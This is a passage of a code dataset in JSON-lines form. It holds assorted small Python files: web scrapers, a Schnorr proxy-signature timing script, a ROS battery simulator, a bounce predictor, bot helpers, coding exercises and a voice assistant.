Don't forget to ruN to the stoRE, you freak!\"\n\n\ndef word_count(s):\n new_list = s.lower().split()\n # forbidden characters\n forbidden = '\":;,.-+=/\\|[]}{()?!*^&'\n storage = {}\n for word in new_list:\n word = word.lower()\n for letter in word:\n if letter in forbidden:\n word = word.replace(letter, \"\")\n if word == \"\":\n continue\n if word in storage:\n storage[word] = storage[word] + \"#\"\n if word not in storage:\n storage[word] = \"#\"\n\n for key, value in sorted(storage.items(), key=lambda x: -len(x[1])):\n print(f'{key: <16}{value}')\n\n\nword_count(words)\n","sub_path":"applications/histo/histo.py","file_name":"histo.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"588799685","text":"# the goal of this program is to find the magicNumber.\n\nmagicNumber = 27\n\n# To print different data types on the same line NOTE: remove # on second line to run code.\n# print(\"AK\",47)\n\n''' This is a multiline comment\nfor n in range(101):\n if n == magicNumber:\n print()\n'''\n# To print the same data types on the same line\n# print(\"Hello my name is \" + \"Khalil\")\nfor n in range(101):\n if n == magicNumber:\n print(n, \"Is the magic number!\")\n break\n else:\n print(n)\n","sub_path":"comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"204350708","text":"import os\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom selenium import webdriver\nimport urllib.request\nimport time\n\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\n\ndriver = webdriver.Chrome('D:/chromedriver')\nurl = 'http://mdcar.kr/search/list.mdc?ct=-2&b=%EC%A0%9C%EC%A1%B0%EC%82%AC&mg=%EB%AA%A8%EB%8D%B8&m=%EC%83%81%EC%84%B8%2B%EB%AA%A8%EB%8D%B8&cg=%EB%93%B1%EA%B8%89&c=&tt=&ft=&yb=&ye=&area=&cp=&cp2=&ac=&ip=&id=&fx=&ck=&lp=&pb=&pe=&mb=&me=&o1=&o2=&o3=&o4=&o5=&or=4&pg={}'\n\n# wait until someid is clickable\nwait = WebDriverWait(driver, 10)\n\npic_num = 0\n\nfor pg in range(9,16): # visit each results page in order\n driver.get(url.format(pg+1))\n print(\"page\" , pg+1)\n driver.implicitly_wait(30) # wait for the page to load\n # wait.until(EC.element_to_be_clickable((By.CLASS_NAME, 'price')))\n time.sleep(1.5)\n\n for pic in range(2, 17) : # open each car listing in order\n print(\"pic\" , pic)\n # page_list_list > li:nth-child(2) > div > div > a\n # page_list_list > li:nth-child(3) > div > div > a\n driver.find_element_by_css_selector('#page_list_list > li:nth-child({}) > div > div > a > div.price'.format(pic)).click()\n time.sleep(2.5)\n # wait.until(EC.element_to_be_clickable((By.ID, 'img'))) # don't advance before the img element appears\n for i in range(3): # pull photos 1-4 from the slider\n images = driver.find_elements_by_css_selector(\"#img\")\n\n for img in images:\n driver.find_element_by_css_selector('#photoNxt').click()\n imgURL = img.get_attribute('src')\n print(imgURL)\n\n pic_num += 1\n\n if not os.path.exists('D:/moldeonCar'):\n os.makedirs('D:/moldeonCar')\n\n urllib.request.urlretrieve(imgURL, 'D:/moldeonCar/'+ str(318+pic_num) + \".jpg\")\n driver.back()\n time.sleep(1.5)\n # wait.until(EC.element_to_be_clickable((By.CLASS_NAME, 'price')))\n\ndriver.close()\n","sub_path":"Crowling/moelderncarCrawling.py","file_name":"moelderncarCrawling.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"380396323","text":"##\n## Python Programming\n## ===========================================================================\n##\n## For the file `data.csv`, print a table in CSV format containing\n## the number of records in which each key of column 5 appears.\n##\n## Answer:\n## aaa,13\n## bbb,16\n## ccc,23\n## ddd,23\n## eee,15\n## fff,20\n## ggg,13\n## hhh,16\n## iii,18\n## jjj,18\n##\n## >>> Write your code from this point on <<<\n##\nf = open('data.csv', 'r').readlines()\nf = [row.replace('\\n', '') for row in f]\nf = [row.split('\\t') for row in f]\nf = [row[4] for row in f]\nf = [row.split(',') for row in f]\nf = [row for rowx in f for row in rowx]\nf = [row.replace(\":\", ',') for row in f]\nf = sorted([row.split(',') for row in f], key=None, reverse=False)\n\nnew_dict={}\nfor i in f:\n if i[0] in new_dict:\n new_dict[i[0]] = new_dict[i[0]] + 1\n else:\n new_dict[i[0]] = 1\nlista = [[key, value] for key, value in new_dict.items()]\n[[print(i[0]+','+str((i[1])))] for i in lista]\n","sub_path":"03-python=1/q09=1/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"143581574","text":"import requests\nfrom bs4 import BeautifulSoup\n\n# pad a number to two digits; output type is string\ndef twoDigit(numb):\n if numb < 10:\n numb = str(numb)\n numb = \"0\" + numb\n return str(numb)\n else:\n return str(numb)\n\n# shorthand for link.get('href')\ndef links():\n return link.get('href')\n\nymin = 1989\nymax = 2016\nmmin = 1\nmmax = 12\n\n# output file for the collected links\nPATH = \"total_links\" + \".html\"\n\nfor y in range(ymin, ymax + 1):\n f = open(PATH, \"a\", encoding=\"utf-8\")\n print(\"Start Crawling the archive \" + str(y))\n for m in range(mmin, mmax + 1):\n m = twoDigit(m)\n url = 'https://neolook.com/archives/' + str(y) + str(m)\n source_code = requests.get(url)\n plain_text = source_code.text\n soup = BeautifulSoup(plain_text, \"html.parser\")\n\n for link in soup.find_all('a'):\n if 20 > len(links()) >= 19:\n print(links())\n f.write('https://neolook.com' + str(links()) + '\\n')\n m = int(m)\n m = m + 1\n print(\"Crawling Done\")\nf.close()\n","sub_path":"toolbox/btNLK_monthLinkCrawler.py","file_name":"btNLK_monthLinkCrawler.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"98094838","text":"##################\n# # # Import # # #\n##################\nfrom charm.toolbox.integergroup import IntegerGroupQ\nfrom charm.core.engine.protocol import *\nimport time\nimport sys\n\n######################\n# # # Parameters # # #\n######################\nPRIME_SIZE = 1024\nmsg_file_path = \"./res/message.txt\"\nwarrant_file_path = \"./res/client.crt\"\ndebug = False\n\n\n#########################\n# # # General Setup # # #\n#########################\ndef setup():\n\n # Generate a cryptographic \"group\" for Zq* based signature (see schnorr signature scheme)\n group = IntegerGroupQ(0)\n\n # Generate p and q with a sufficiently large prime size\n group.paramgen(PRIME_SIZE)\n\n # Generate keys (private: u, public: e) and generator \n p = group.p\n u, g = group.random(), group.randomGen() # u is in Zq, g is in G\n e = (g**u) % p # e is in G, (aka p)\n priv = {'g': g, 'u': u}\n pub = {'g': g, 'e': e}\n \n # read in message warrant\n m_w = open(warrant_file_path, 'r').read()\n\n # read in message to send\n m_p 
= open(msg_file_path, 'r').read()\n\n return {'group': group, 'public': pub,'private': priv,'warrant': m_w, 'message': m_p}\n\n####################################\n# # # Proxy Unprotected Scheme # # #\n####################################\n\ndef generate(m_w, priv, group):\n \n #unpack variables\n p = group.p\n q = group.q\n u = priv['u']\n g = priv['g']\n\n # start timer\n start = time.perf_counter()\n\n # select a random integer in Zq, call it i. This behaves somewhat like a private key.\n i = group.random()\n\n # create a variable t_one, set it equal to i's \"public key\"\n t_one = (g**i) % p\n\n # create a hash of the message warrant and t_one, this acts as a nonce\n j = group.hash(m_w, t_one)\n\n # combine j and the original private key (u) with i, this is now your proxy private key\n b = (j*u + i) % q\n\n # stop timer\n gen_time = time.perf_counter() - start\n\n # package up all necessary information\n gener_msg = (m_w, b, t_one, i)\n\n # end of generate()\n return gener_msg, str(gen_time)\n\n\ndef sign_schnorr(msg, priv, group):\n k = group.random() # randomly chosen in Zq\n r = (priv['g'] ** k) % group.p # evaluated in G, (aka p)\n e = group.hash(msg, r) # evaluated in Zq\n s = (k - priv['u'] * e) % group.q # evaluated in Zq\n return {'s':s, 'e':e}\n\n\ndef sign(gener_msg, msg, priv, pub, group):\n\n # unpack message\n m_w = gener_msg[0]\n b = gener_msg[1]\n t_one = gener_msg[2]\n i = gener_msg[3]\n p = group.p\n q = group.q\n u = priv['u']\n g = priv['g']\n e = pub['e']\n\n # start timer\n start = time.perf_counter()\n\n # create a hash of the message warrant and t_one, this acts as a nonce\n j = group.hash(m_w, t_one)\n\n # combine j and the original private key (u) with i, this is now your proxy private key\n #b = (j*u + i) % q\n\n # raise g^b for verification\n #g_b = (g**b) % p\n\n # create the check to confirm validity of b and {m_w, t_one} congruence\n #g_b_sign = ( (e**j) * t_one ) % p\n\n # Verify that g_b and g_b_sign equate\n \n #if debug:\n # if (g_b != g_b_sign):\n # print(\"[Error] g_b and g_b_sign are not equivalent.\")\n # else: \n # print(\"[Success] g^b and e^j * t_one are equivalent.\")\n\n # sign\n sig = sign_schnorr(msg, {'g': g, 'u':b}, group)\n\n # stop timer\n sign_time = time.perf_counter() - start\n\n # pass a tuple containing (m_p, s, t_one, m_w) to the verifier\n sign_msg = (msg, sig, t_one, m_w)\n\n return sign_msg, str(sign_time) \n\n\ndef verif_schnorr(msg, sig, pub, group):\n r = ((pub['g'] ** sig['s']) * (pub['e'] ** sig['e'])) % group.p # evaluated in G, (aka p)\n e = group.hash(msg, r) # evaluated in Zq\n if e == sig['e']:\n return True\n else:\n return False\n return None\n\n\ndef verify(sign_msg, pub, group):\n\n # unpack message\n m_w = sign_msg[3]\n t_one = sign_msg[2]\n sig = sign_msg[1]\n msg = sign_msg[0]\n e = pub['e']\n g = pub['g']\n p = group.p\n q = group.q\n\n # start timer\n start = time.perf_counter()\n\n # create a hash of the message warrant and t_one, this acts as a nonce\n j = group.hash(m_w, t_one)\n\n # raise e to the power of j and multiply by t_one to create the public key\n e_prime = ( (e**j) * t_one ) % p\n\n # verify\n res = verif_schnorr(msg, sig, {'g': g, 'e': e_prime}, group)\n\n # stop timer\n verif_timer = time.perf_counter() - start\n\n if debug:\n if res:\n print(\"Success\")\n else:\n print(\"Failure\")\n\n return str(verif_timer)\n\n\n\ndef schnorr_wrapper(vals):\n start1 = time.perf_counter()\n sig = sign_schnorr(vals['message'], vals['private'], vals['group'])\n schnorr_sign_time = time.perf_counter() - 
start1\n start2 = time.perf_counter()\n verif_schnorr(vals['message'], sig, vals['public'], vals['group'])\n schnorr_verif_time = time.perf_counter() - start2\n return str(schnorr_sign_time), str(schnorr_verif_time)\n\ndef master():\n vals = setup() \n gen_msg, gen_time = generate(vals['warrant'],vals['private'],vals['group'])\n sign_msg, sign_time = sign(gen_msg, vals['message'], vals['private'], vals['public'], vals['group'])\n verif_time = verify(sign_msg, vals['public'], vals['group'])\n schnorr_sign_time, schnorr_verif_time = schnorr_wrapper(vals)\n\n if debug:\n print('gen_time')\n print(gen_time)\n print('')\n print('sign_time')\n print(sign_time)\n print('')\n print('verif_time')\n print(verif_time)\n print('')\n print('schnorr_sign_time')\n print(schnorr_sign_time)\n print('')\n print('schnorr_verify_time')\n print(schnorr_verif_time)\n print('')\n\n with open(\"proxy-signature-timings.csv\" , \"a\") as f:\n f.write((\", \".join([gen_time, sign_time, verif_time, schnorr_sign_time, schnorr_verif_time]))+\"\\n\")\n\n\n\nmaster()\n","sub_path":"proxsig.py","file_name":"proxsig.py","file_ext":"py","file_size_in_byte":6071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"588172084","text":"def get_user_info(update):\n \"\"\"Return user information who interacts with bot.\"\"\"\n return 'Request from user_id: {0}, username: {1},' \\\n 'first_name: {2}, last_name: {3}'.format(\n update.message.chat.id,\n update.message.chat.username,\n update.message.chat.first_name,\n update.message.chat.last_name)\n\n\ndef print_access_error(update):\n \"\"\"Send authorization error to telegram chat.\"\"\"\n update.message.reply_text('Not authorized')\n\n\ndef build_commands_presentation(bot, cam_id):\n groups = []\n for desc, cmds in bot.cam_registry.get_commands(cam_id).items():\n groups.append(\n '{0}\\n{1}'.format(desc, '\\n'.join(['/' + c for c in cmds])))\n return '\\n\\n'.join(groups)\n","sub_path":"hikcamerabot/callbacks/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"353398716","text":"def check(n, h, idx, start, res):\n if idx == h:\n print(''.join(res))\n return\n for i in range(n - h + idx, start - 1, -1):\n res[i] = '1'\n check(n, h, idx + 1, i + 1, res)\n res[i] = '0'\ndef solve():\n input()\n n, h = map(int, input().split())\n res = ['0'] * n\n check(n, h, 0, 0, res)\n\nt = int(input())\nfor tc in range(t):\n solve()\n if tc < t - 1:\n print()","sub_path":"Backtracking/The Hamming Distance Problem.py","file_name":"The Hamming Distance Problem.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"137975149","text":"#!/usr/bin/env python\nimport rospy\nimport random\nfrom numpy.random import normal\nfrom math import sqrt\nfrom sensor_msgs.msg import BatteryState\n\ndef bms():\n\trospy.init_node('BMS')\n\trate = rospy.Rate(10)\n\tstart = rospy.Time.now()\n\tmAh_cap = 3000 #battery charge max capacity\n\tvariance = 50 #mAh variance in battery reading\n\tpub = rospy.Publisher('battery', BatteryState, queue_size=10)\n\twhile not rospy.is_shutdown():\n\t\tdiff = rospy.Time.now() - start\n\t\tfifteen = rospy.Duration.from_sec(900)\n\t\tcharge_remaining = mAh_cap*(1-diff/fifteen)\n\t\treading = normal(charge_remaining, sqrt(variance))\n\t\tmessage = BatteryState()\n\t\tmessage.charge = reading\n\t\tmessage.voltage = 
reading\n\t\tpub.publish(message)\n\t\trate.sleep()\n\nif __name__ == '__main__':\n\tbms()\n","sub_path":"scripts/simulated_sensors/bms.py","file_name":"bms.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"254839018","text":"import math\nfrom tj2_tools.robot_state import Simple3DState\nfrom fitting_trajectory import predict\n\ndef get_next_state(t0, x0, v0, a, t_step):\n t1 = t0 + t_step\n dt = t1 - t0\n\n x1 = x0 + v0 * dt + 0.5 * a * dt * dt\n v1 = v0 + a * dt\n return t1, x1, v1\n\n\ndef one_bounce(t0, x0, v0, a, t_limit, t_step):\n while x0 >= 0.0 and t0 < t_limit:\n t0, x0, v0 = get_next_state(t0, x0, v0, a, t_step)\n\n if x0 < 0.0:\n x0 = 0.0\n\n return t0, x0, v0\n\n\ndef get_bounces(x0, v0, rho, tau, g, t_limit, t_step):\n \"\"\"\n :param x0: initial height\n :param v0: initial velocity\n :param rho: coefficient of restitution (how much velocity is retained after a bounce)\n :param tau: contact time (how long velocity is 0.0 during a bounce)\n :param g: acceleration due to gravity (must be < 0.0)\n :param t_limit: time above which the simulation is considered done\n :param t_step: time resolution of simulation\n :return: t data, x data\n \"\"\"\n assert g < 0.0\n t1 = 0.0\n x1 = x0\n first = True\n while first or t1 < t_limit:\n t1, x1, v0 = one_bounce(t1 + (0.0 if first else tau), x1, v0, g, t_limit, t_step)\n v0 *= -rho\n if first:\n first = False\n return x1, v0\n\n\ndef roll_object(x0, v0, a, t_limit, t_step):\n t0 = 0.0\n\n while t0 < t_limit and v0 > 0.0:\n t0, x0, v0 = get_next_state(t0, x0, v0, a, t_step)\n\n return x0, v0\n\n\ndef get_time_to_distance(x1, v0, a, vmax, t_limit, t_step, data=None):\n \"\"\"\n :param x1: distance to goal (assume starting from 0.0)\n :param v0: initial velocity\n :param a: acceleration of system\n :param vmax: maximum velocity of the system\n :param t_limit: time above which the simulation is considered done\n :param t_step: time resolution of simulation\n :return: t arrival\n \"\"\"\n t0 = 0.0\n x0 = 0.0\n a = math.copysign(a, x1)\n\n while t0 < t_limit:\n t0, x0, v0 = get_next_state(t0, x0, v0, a, t_step)\n v0 = min(vmax, max(-vmax, v0)) # clip velocity to -vmax...+vmax\n if data is not None:\n data.append([t0, x0, v0])\n if x1 < 0.0:\n if x0 < x1:\n return t0\n else:\n if x0 > x1:\n return t0\n\n return t0\n\nclass BouncePredictor:\n def __init__(self, rho, tau, g, a_friction, t_step, ground_plane, a_robot, v_max_robot, t_limit):\n self.rho = rho\n self.tau = tau\n self.g = g\n self.a_friction = a_friction\n self.t_step = t_step\n self.ground_plane = ground_plane\n self.a_robot = a_robot\n self.v_max_robot = v_max_robot\n self.t_limit = t_limit\n\n def get_prediction(self, state: Simple3DState, t_window):\n x0 = state.x\n vx0 = state.vx\n x1, vx1 = roll_object(x0, vx0, self.a_friction, t_window, self.t_step)\n\n y0 = state.y\n vy0 = state.vy\n y1, vy1 = roll_object(y0, vy0, self.a_friction, t_window, self.t_step)\n\n z0 = state.z - self.ground_plane\n vz0 = state.vz\n z1, vz1 = get_bounces(z0, vz0, self.rho, self.tau, self.g, t_window, self.t_step)\n z1 += self.ground_plane\n\n future_state = Simple3DState(x1, y1, z1, state.theta, vx1, vy1, vz1, state.vt)\n future_state.stamp = state.stamp + t_window\n return future_state\n\n def get_robot_intersection(self, odom_msgs, detection_msgs):\n msgs = odom_msgs + detection_msgs\n rv = self.v_max_robot # robot velocity\n vx, vy, cx, cy = predict(msgs)\n dist = math.sqrt(cx*cx+cy*cy)\n time = dist / 
rv\n nx, ny = cx+vx*time, cy+vy*time # newx, newy\n rad = math.atan2(ny, nx)\n\n # build the intersection state (velocities left at zero); Simple3DState takes (x, y, z, theta, vx, vy, vz, vt) as in get_prediction above\n state = Simple3DState(nx, ny, 0, rad, 0.0, 0.0, 0.0, 0.0)\n state.stamp = time # time from the last detection time.\n\n return state #self.get_prediction(obj_state, t_window)\n","sub_path":"playground/bounce_trajectories/predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"412790336","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 9.9.2012\n\n@author: huqa // Ville Riikonen \n@copyright Copyright (c) 2012,2014 Ville Riikonen\n@license BSD\n\"\"\"\n\nimport datetime\nimport time\nfrom math import ceil, sqrt\nimport namedays as nday\nfrom operator import itemgetter\n\n\nclass Pvm(object):\n\n def __init__(self, bot):\n self.bot = bot\n self.channels = []\n \n # remind every day at midnight\n def midnight_shout(self):\n #self.bot.scheduler.add_cron_job(self.shout_pvm_stats, second='0', month='*', day='*', hour='0', minute='0', day_of_week='*')\n self.bot.scheduler.add_job(self.shout_pvm_stats, 'cron', month='*', day='*', day_of_week='*', hour='0', minute='0', second='0')\n\n def shout_pvm_stats(self):\n \"\"\"Internal command for shouting word stats and day info at midnight\"\"\"\n if not self.bot:\n return\n\n if not self.channels:\n self.channels = self.bot.get_channels_for_stats()\n ds = time.localtime()\n weekn = datetime.date(ds.tm_year, ds.tm_mon, ds.tm_mday).isocalendar()[1]\n outstr = \"Tänään on \" + nday.wday_str(ds.tm_wday) + \" \" + str(ds.tm_mday) + \".\" \\\n + str(ds.tm_mon) + \".\" + str(ds.tm_year) + \" (viikko \" + str(weekn) +\") vuoden \" + str(ds.tm_yday) + \". päivä. Nimipäivää viettää \" + nday.get_nameday(ds.tm_mon,ds.tm_mday)\n toptod = self.bot.get_words()\n words_str = \"\"\n for ch in self.channels:\n time.sleep(10)\n if ch in toptod: \n stats = toptod[ch]\n sorted_stats = sorted(stats.iteritems(), key=itemgetter(1))[0:10]\n sorted_stats.reverse()\n sija = 1\n all = 0\n mean = 0\n words_str = \"\"\n med_sija = int(ceil(len(sorted_stats) / 2.0))\n median = 0\n for x in sorted_stats:\n if sija == med_sija:\n median = x[1]\n words_str += \" %d. 
%s:(%d)\" % (sija, str(x[0]), x[1])\n sija += 1\n all += x[1]\n mean = all / (sija - 1)\n var_summa = 0\n for x in sorted_stats:\n var_summa += ((x[1] - mean)**2)\n keskihajonta = sqrt((var_summa/float((sija - 1))))\n self.bot.say(ch, words_str.strip())\n self.bot.say(ch, \"Top 10 yhteensä: %d Keskiarvo: %d Mediaani: %d Keskihajonta: %d\" % (all, mean, median, keskihajonta))\n self.top_all(ch, stats)\n self.bot.say(ch, outstr)\n \n self.bot.clear_words()\n\n def top_all(self, channel, stats):\n sorted_stats = sorted(stats.iteritems(), key=itemgetter(1))\n sorted_stats.reverse()\n sija = 1\n all = 0\n med_sija = int(ceil(len(sorted_stats) / 2.0))\n median = 0\n for x in sorted_stats:\n if sija is med_sija:\n median = x[1]\n sija += 1\n all += x[1]\n mean = all / (sija - 1)\n var_summa = 0\n for x in sorted_stats:\n var_summa += ((x[1] - mean)**2)\n keskihajonta = sqrt((var_summa/float((sija - 1))))\n self.bot.say(channel, \"Kaikki yhteensä: %d Keskiarvo: %d Mediaani: %d Keskihajonta: %d\" % (all, mean, median, keskihajonta)) \n\n def shout_pvm_stats_to_chan(self, chan):\n if not self.bot:\n return\n \n if not chan:\n return\n \n ds = time.localtime()\n weekn = datetime.date(ds.tm_year, ds.tm_mon, ds.tm_mday).isocalendar()[1]\n outstr = \"Tänään on \" + nday.wday_str(ds.tm_wday) + \" \" + str(ds.tm_mday) + \".\" \\\n + str(ds.tm_mon) + \".\" + str(ds.tm_year) + \" (viikko \" + str(weekn) +\") vuoden \" + str(ds.tm_yday) + \". päivä. Nimipäivää viettää \" + nday.get_nameday(ds.tm_mon,ds.tm_mday)\n\n self.bot.say(chan, outstr)\n","sub_path":"pyfibot/lib/pvm.py","file_name":"pvm.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"584860959","text":"NO_CONTEXT_WORD = 'OSOFo'\nPAD_WORD = ''\nSTART_WORD = ''\nEND_WORD = ''\nUNKNOWN_WORD = ''\nSEP_CONTEXT_WORD = ''\nSEP_PAIR_WORD = ''\nSEP_RET_WORD = ''\nPAD_IDX = 0\nSTART_IDX = 1\nEND_IDX = 2\nNO_CONTEXT_IDX = 3\nUNKNOWN_IDX = 4\nSEP_CONTEXT_IDX = 5\nSEP_PAIR_IDX = 6\nSEP_RET_IDX = 7","sub_path":"DataClass/Constants.py","file_name":"Constants.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"372056576","text":"from scrapy.spider import BaseSpider\r\nfrom scrapy.selector import HtmlXPathSelector\r\nfrom scrapy.http import Request\r\n\r\nimport datetime\r\nimport re\r\nimport book_structure as book\r\n\r\nclass WowEbook(BaseSpider):\r\n name = \"wow\"\r\n allowed_domains = [\"wowebook.be\"]\r\n# start_urls = [\"http://www.wowebook.be/book/zk-developers-guide/\"]\r\n def parse(self, response):\r\n file_name = response.url.split('/')[-2] + \".xml\"\r\n hxs = HtmlXPathSelector(response)\r\n try:\r\n lst = hxs.select('//em/a/text()').extract()\r\n book.categoriesE.clear()\r\n for val in lst:\r\n tag = book.etree.Element('tag')\r\n tag.set('site', self.allowed_domains[0])\r\n tag.text = val\r\n book.categoriesE.append(tag)\r\n for val in hxs.select('//img[@class=\"alignleft\"]').extract()[0].split('\"'):\r\n if val.find(\"http\") != -1:\r\n book.images_itemE.text = val\r\n book.titleE.text = hxs.select('//title/text()').extract()[0].split('|')[0]\r\n book.sizeE.text = hxs.select('//pre/strong/text()').extract()[0]\r\n book.dl_dateE.text = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n book.post_dateE.text = hxs.select('//span[@class=\"date\"]/text()').extract()[0]\r\n book.resource_urlE.text = response.url\r\n book.source_urlE.text = 
response.url\r\n book.resource_urlE.set(\"site\", \"www.wowebook.be\")\r\n content = hxs.select('//div[@class=\"entry clearfix\"]').extract()[0]\r\n index = content.find(\"Book Details\")\r\n real_content = content[:index-4]\r\n book.contentE.text = re.sub(r'\\n|\\t','',re.sub(r'\\t|\\n|<[^>]+>',\"\",real_content))\r\n isbn_count = 0\r\n isbn10 = 0\r\n isbn13 = 0\r\n language = 0\r\n release_date = 0\r\n page = 0\r\n isbn_list = hxs.select('//div[@class=\"entry clearfix\"]/div/ul/li').extract()\r\n #isbn_list = hxs.select('//div[@class=\"entry clearfix\"]/ul/li').extract()\r\n for val in isbn_list:\r\n if val.find(\"ISBN-10\") != -1:\r\n isbn10 = isbn_count\r\n if val.find(\"ISBN-13\") != -1:\r\n isbn13 = isbn_count\r\n if val.find(\"Language\") != -1:\r\n language = isbn_count\r\n if val.find(\"Publisher\") != -1:\r\n release_date = isbn_count\r\n if val.find(\"Paperback\") != -1 or val.find(\"Hardcover\") != -1:\r\n if val.find(\"Paperback\") != -1:\r\n book.formatE.set('type', 'Paperback')\r\n else:\r\n book.formatE.set('type', 'Hardcover')\r\n page = isbn_count\r\n isbn_count = isbn_count + 1\r\n if release_date != 0:\r\n book.releaseE.text = isbn_list[release_date].split('(')[1].split(')')[0]\r\n if language != 0:\r\n book.languageE.text = isbn_list[language].split()[-1].split('<')[0]\r\n if page != 0:\r\n book.pagesE.text = isbn_list[page].split()[1]\r\n if isbn10 != 0:\r\n book.idE.text = isbn_list[isbn10].split()[-1].split('<')[0]\r\n book.isbn10E.text = isbn_list[isbn10].split()[-1].split('<')[0]\r\n if isbn13 != 0:\r\n book.isbn13E.text = isbn_list[isbn13].split()[-1].split('<')[0]\r\n\r\n book.dl_urlE.text = \"http://\" + hxs.select('//div[@class=\"entry clearfix\"]/div/pre/strong/a/@href').extract()[0].split('http://')[-1] + \".html\"\r\n book.text2E.text = hxs.select('//div[@class=\"entry clearfix\"]/div/pre/strong/a/@title').extract()[0]\r\n book.textE.text = hxs.select('//div[@class=\"entry clearfix\"]/div/pre/strong/text()').extract()[1]\r\n file = open(file_name, 'w')\r\n book.doc.write(file)\r\n file.close()\r\n except IndexError:\r\n book.text2E.text = hxs.select('//div[@class=\"entry clearfix\"]/div/pre/strong/a/@title').extract()[0]\r\n book.dl_urlE.text = \"http://\" + hxs.select('//div[@class=\"entry clearfix\"]/div/pre/strong/a/@href').extract()[0].split('http://')[-1] + \".html\"\r\n book.textE.text = hxs.select('//div[@class=\"entry clearfix\"]/div/pre/strong/text()').extract()[1]\r\n file = open(file_name, 'w')\r\n book.doc.write(file)\r\n file.close()\r\n file_error = open(\"error1.log\", 'a')\r\n msg = response.url + ' IndexError' + '\\n'\r\n file_error.write(msg)\r\n file_error.close()\r\n except UnboundLocalError:\r\n msg = response.url + ' UnboundLocalError' + '\\n'\r\n file = open(file_name, 'w')\r\n book.doc.write(file)\r\n file.close()\r\n file_error = open(\"error1.log\", 'a')\r\n file_error.write(msg)\r\n file_error.close()\r\n\r\n def start_requests(self):\r\n with open(\"error.log\", 'rb') as urls:\r\n for url in urls:\r\n yield Request(url.split()[0], self.parse)\r\n","sub_path":"ebook/book_structure_v2_with_try.py","file_name":"book_structure_v2_with_try.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"371924241","text":"import pyttsx3 #pip install pyttsx3\nimport datetime \nimport speech_recognition as sr #pip install speech-recognition\nimport wikipedia #pip install wikipedia\nimport webbrowser\nimport os\nimport random\n\n\nengine = pyttsx3.init('sapi5') #sapi5 is the Microsoft Speech API used for synthesis\nvoices = engine.getProperty('voices')\nengine.setProperty('voice',voices[1].id)\n\ndef speak(audio):\n \"\"\"Make the system speak the given text aloud.\"\"\"\n 
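# queue the text on the TTS engine and block until playback finishes\n 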
engine.say(audio)\n engine.runAndWait()\n\ndef wishMe():\n \"\"\" Call the date and time module and help to recogize the time and date which wll help to say GM/GA/GE\"\"\"\n hour = int(datetime.datetime.now().hour) \n if hour >=0 and hour<12:\n speak(\"Good Morning\")\n\n elif hour>=12 and hour<18:\n speak(\"Good Afternoon\")\n\n else:\n speak(\"Good Evening\")\n\n speak(\"Hey Sir I am Siere your Virtual Assistant. How may I help you\")\n\ndef takeCommand():\n '''\n It takes michrophone input from the user and returns string as output\n In simple words it listen your commands and gives the output that you spoked\n '''\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Listening!!!......\")\n r.pause_threshold = 0.9\n r.energy_threshold =380\n r.phrase_threshold = 0.4\n audio = r.listen(source)\n\n try:\n print(\"Recognizing.....\")\n query = r.recognize_google(audio,language='en-in') # Converssion of audio data to English language \n query = r.recognize_google(audio, language='en-us')\n print(f\"User said: {query}\\n\")\n\n except Exception:\n print(\"Please say that again......\")\n speak(\"Please say that again\")\n return \"None\"\n\n return query\n\n\n# if __name__ == '__main__':\nwishMe()\nwhile True:\n query = takeCommand().lower()\n\n #Logic for executing tasks bassed on query\n if 'wikipedia' in query:\n # speak(\"Searching Wikipedia....\")\n query = query.replace(\"wikipedia\",\"\")\n results = wikipedia.summary(query,sentences=1)\n speak(\"According to Wikipedia\")\n print(results)\n speak(results)\n elif 'open youtube' in query:\n webbrowser.open(\"youtube.com\")\n elif 'open google' in query:\n webbrowser.open(\"google.com\")\n elif 'open amazon' in query:\n webbrowser.open(\"amazon.in\")\n elif 'open stackoverflow' in query:\n webbrowser.open(\"stackoverflow.com\")\n\n elif 'play music' in query:\n music_dir = 'C:\\\\Users\\\\ayush\\\\OneDrive\\\\Desktop\\\\AYUSHMAAN\\\\musics\\\\English'\n songs = os.listdir(music_dir)\n os.startfile(os.path.join(music_dir, songs[random.randrange(0,len(songs))]))\n speak(\"Sure!\")\n\n elif 'the time' in query:\n strTime = datetime.datetime.now().strftime(\"%H:%M:%S\")\n speak(f\"Sir, the time is {strTime}\") \n\n elif 'open code' in query:\n codepath = \"C:\\\\Users\\\\ayush\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\"\n # speak(\"Opening VS Code\")\n 